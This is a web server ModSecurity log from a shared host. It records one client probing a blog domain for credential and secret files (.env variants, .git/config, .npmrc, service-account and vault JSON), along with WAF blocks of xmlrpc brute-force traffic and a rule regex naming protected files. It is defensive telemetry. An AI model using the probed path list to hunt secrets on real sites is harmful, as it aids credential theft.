[Tue May 26 15:40:24.312387 2026] [security2:error] [pid 733610:tid 733760] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPsAAAABQ"], referer: https://bloggertarget.com/config/application.properties
[Tue May 26 15:40:24.328341 2026] [security2:error] [pid 733610:tid 733791] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPrAAAADM"], referer: https://bloggertarget.com/vault/secrets/config
[Tue May 26 15:40:24.385476 2026] [security2:error] [pid 733610:tid 733780] [client 5.255.126.59:55508] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPsQAAACg"], referer: https://bloggertarget.com/.docker/config.json
[Tue May 26 15:40:24.457905 2026] [security2:error] [pid 733610:tid 733764] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPwAAAABg"], referer: https://bloggertarget.com/.git/config
[Tue May 26 15:40:24.460874 2026] [security2:error] [pid 733610:tid 733756] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPvwAAABA"], referer: https://bloggertarget.com/.env.development
[Tue May 26 15:40:24.465218 2026] [security2:error] [pid 733610:tid 733842] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPwgAAAGY"], referer: https://bloggertarget.com/.npmrc
[Tue May 26 15:40:24.466762 2026] [security2:error] [pid 733610:tid 733830] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPwwAAAFo"], referer: https://bloggertarget.com/admin/.env
[Tue May 26 15:40:24.474362 2026] [security2:error] [pid 733610:tid 733784] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPwQAAACw"], referer: https://bloggertarget.com/.env.staging
[Tue May 26 15:40:24.510144 2026] [security2:error] [pid 733610:tid 733788] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPtAAAADA"]
[Tue May 26 15:40:24.713831 2026] [security2:error] [pid 733610:tid 733743] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPygAAAAM"], referer: https://bloggertarget.com/keys/service-account.json
[Tue May 26 15:40:24.786825 2026] [security2:error] [pid 733610:tid 733865] [client 5.255.126.59:40202] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfPywAAAH0"], referer: https://bloggertarget.com/sa.json
[Tue May 26 15:40:24.981397 2026] [security2:error] [pid 733610:tid 733792] [client 5.255.126.59:55508] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfP0gAAADQ"], referer: https://bloggertarget.com/key.json
[Tue May 26 15:40:25.032709 2026] [security2:error] [pid 733610:tid 733748] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfP2gAAAAg"], referer: https://bloggertarget.com/secrets.yml
[Tue May 26 15:40:25.082006 2026] [security2:error] [pid 733610:tid 733823] [client 5.255.126.59:40272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkMLL_4PasUNKBsfP3AAAAFM"], referer: https://bloggertarget.com/credentials.json
[Tue May 26 15:40:25.573640 2026] [security2:error] [pid 733610:tid 733847] [client 5.255.126.59:55532] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfP6QAAAGs"], referer: https://bloggertarget.com/storage/logs/laravel.log
[Tue May 26 15:40:25.609997 2026] [security2:error] [pid 733610:tid 733785] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfP7AAAAC0"], referer: https://bloggertarget.com/config/secrets.yml
[Tue May 26 15:40:25.652385 2026] [security2:error] [pid 733610:tid 733818] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfP8AAAAE4"], referer: https://bloggertarget.com/.env.local
[Tue May 26 15:40:25.676649 2026] [security2:error] [pid 733610:tid 733767] [client 5.255.126.59:55556] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfP7wAAABs"], referer: https://bloggertarget.com/secrets.json
[Tue May 26 15:40:25.719201 2026] [security2:error] [pid 733610:tid 733855] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfP-wAAAHM"], referer: https://bloggertarget.com/.env.example
[Tue May 26 15:40:25.720272 2026] [security2:error] [pid 733610:tid 733820] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfP-QAAAFA"], referer: https://bloggertarget.com/.env.test
[Tue May 26 15:40:25.735401 2026] [security2:error] [pid 733610:tid 733802] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfP_AAAAD4"], referer: https://bloggertarget.com/settings.py
[Tue May 26 15:40:25.741032 2026] [security2:error] [pid 733610:tid 733852] [client 5.255.126.59:40202] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfP_QAAAHA"], referer: https://bloggertarget.com/service-account.json
[Tue May 26 15:40:25.748002 2026] [security2:error] [pid 733610:tid 733825] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfQAAAAAFU"], referer: https://bloggertarget.com/config.env
[Tue May 26 15:40:25.849747 2026] [security2:error] [pid 733610:tid 733810] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfQBwAAAEY"], referer: https://bloggertarget.com/application.yml
[Tue May 26 15:40:25.904133 2026] [security2:error] [pid 733610:tid 733841] [client 5.255.126.59:55486] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfQCgAAAGU"], referer: https://bloggertarget.com/secrets/vault.json
[Tue May 26 15:40:26.304926 2026] [security2:error] [pid 733610:tid 733817] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxkcLL_4PasUNKBsfQFAAAAE0"]
[Tue May 26 15:40:26.746776 2026] [core:crit] [pid 733610:tid 733751] (13)Permission denied: [client 157.55.39.48:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:40:27.137752 2026] [core:crit] [pid 733610:tid 733833] (13)Permission denied: [client 157.55.39.48:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:40:27.279615 2026] [security2:error] [pid 733610:tid 733761] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQPwAAABU"]
[Tue May 26 15:40:27.290263 2026] [security2:error] [pid 733610:tid 733801] [client 5.255.126.59:55478] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQJAAAAD0"]
[Tue May 26 15:40:27.301687 2026] [security2:error] [pid 733610:tid 733753] [client 5.255.126.59:55210] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQLQAAAA0"]
[Tue May 26 15:40:27.310860 2026] [security2:error] [pid 733610:tid 733763] [client 5.255.126.59:55304] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQOgAAABc"]
[Tue May 26 15:40:27.317458 2026] [security2:error] [pid 733610:tid 733791] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQRwAAADM"]
[Tue May 26 15:40:27.333340 2026] [security2:error] [pid 733610:tid 733759] [client 5.255.126.59:55396] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQIgAAABM"]
[Tue May 26 15:40:27.334330 2026] [security2:error] [pid 733610:tid 733765] [client 5.255.126.59:55370] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQKgAAABk"]
[Tue May 26 15:40:27.344049 2026] [security2:error] [pid 733610:tid 733837] [client 5.255.126.59:55466] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQMwAAAGE"]
[Tue May 26 15:40:27.351905 2026] [security2:error] [pid 733610:tid 733834] [client 5.255.126.59:55416] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQKAAAAF4"]
[Tue May 26 15:40:27.358038 2026] [security2:error] [pid 733610:tid 733780] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQTwAAACg"]
[Tue May 26 15:40:27.358636 2026] [security2:error] [pid 733610:tid 733764] [client 5.255.126.59:55430] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQIAAAABg"]
[Tue May 26 15:40:27.365394 2026] [security2:error] [pid 733610:tid 733745] [client 5.255.126.59:55102] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQLwAAAAU"]
[Tue May 26 15:40:27.368130 2026] [security2:error] [pid 733610:tid 733797] [client 5.255.126.59:55402] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQJgAAADk"]
[Tue May 26 15:40:27.383351 2026] [security2:error] [pid 733610:tid 733816] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQTgAAAEw"]
[Tue May 26 15:40:27.384859 2026] [security2:error] [pid 733610:tid 733771] [client 5.255.126.59:55454] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQJwAAAB8"]
[Tue May 26 15:40:27.385398 2026] [security2:error] [pid 733610:tid 733811] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQSgAAAEc"]
[Tue May 26 15:40:27.389310 2026] [security2:error] [pid 733610:tid 733836] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQRQAAAGA"]
[Tue May 26 15:40:27.392411 2026] [security2:error] [pid 733610:tid 733829] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQTQAAAFk"]
[Tue May 26 15:40:27.405175 2026] [security2:error] [pid 733610:tid 733819] [client 5.255.126.59:55442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQOAAAAE8"]
[Tue May 26 15:40:27.406103 2026] [security2:error] [pid 733610:tid 733866] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQSwAAAH4"]
[Tue May 26 15:40:27.406224 2026] [security2:error] [pid 733610:tid 733756] [client 5.255.126.59:55386] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQLgAAABA"]
[Tue May 26 15:40:27.412615 2026] [security2:error] [pid 733610:tid 733831] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQUgAAAFs"]
[Tue May 26 15:40:27.412865 2026] [security2:error] [pid 733610:tid 733825] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQUAAAAFU"]
[Tue May 26 15:40:27.427137 2026] [security2:error] [pid 733610:tid 733852] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQRAAAAHA"]
[Tue May 26 15:40:27.452305 2026] [security2:error] [pid 733610:tid 733742] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQUQAAAAI"]
[Tue May 26 15:40:27.453836 2026] [security2:error] [pid 733610:tid 733855] [client 5.255.126.59:55162] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxksLL_4PasUNKBsfQNwAAAHM"]
[Tue May 26 15:40:28.256702 2026] [security2:error] [pid 733610:tid 733844] [client 223.123.38.127:15220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxlMLL_4PasUNKBsfQfAAAAGg"]
[Tue May 26 15:40:28.256827 2026] [security2:error] [pid 733610:tid 733844] [client 223.123.38.127:15220] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxlMLL_4PasUNKBsfQfAAAAGg"]
[Tue May 26 15:40:28.736994 2026] [security2:error] [pid 733610:tid 733796] [client 103.153.130.62:57295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxlMLL_4PasUNKBsfQiQAAADg"]
[Tue May 26 15:40:28.737131 2026] [security2:error] [pid 733610:tid 733796] [client 103.153.130.62:57295] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxlMLL_4PasUNKBsfQiQAAADg"]
[Tue May 26 15:40:28.828967 2026] [security2:error] [pid 733610:tid 733750] [client 195.178.110.34:56450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVxlMLL_4PasUNKBsfQjQAAAAo"]
[Tue May 26 15:40:28.921265 2026] [security2:error] [pid 733610:tid 733780] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxlMLL_4PasUNKBsfQgwAAACg"]
[Tue May 26 15:40:29.107216 2026] [security2:error] [pid 733610:tid 733773] [client 5.255.126.59:40302] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlMLL_4PasUNKBsfQjgAAACE"], referer: https://bloggertarget.com/env.js
[Tue May 26 15:40:29.650333 2026] [security2:error] [pid 733610:tid 733835] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQsAAAAF8"], referer: https://bloggertarget.com/api/settings
[Tue May 26 15:40:29.654161 2026] [security2:error] [pid 733610:tid 733755] [client 5.255.126.59:40338] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQpgAAAA8"], referer: https://bloggertarget.com/api/openapi.json
[Tue May 26 15:40:29.669157 2026] [security2:error] [pid 733610:tid 733767] [client 5.255.126.59:40384] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQoAAAABs"], referer: https://bloggertarget.com/settings.json
[Tue May 26 15:40:29.670881 2026] [security2:error] [pid 733610:tid 733814] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQrgAAAEo"], referer: https://bloggertarget.com/api/health
[Tue May 26 15:40:29.672106 2026] [security2:error] [pid 733610:tid 733809] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQsQAAAEU"], referer: https://bloggertarget.com/api/v2/settings
[Tue May 26 15:40:29.676445 2026] [security2:error] [pid 733610:tid 733847] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQsgAAAGs"], referer: https://bloggertarget.com/api/v1/settings
[Tue May 26 15:40:29.678670 2026] [security2:error] [pid 733610:tid 733781] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQrwAAACk"], referer: https://bloggertarget.com/api/v1/env
[Tue May 26 15:40:29.689218 2026] [security2:error] [pid 733610:tid 733840] [client 5.255.126.59:40408] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxlcLL_4PasUNKBsfQoQAAAGQ"], referer: https://bloggertarget.com/swagger.json
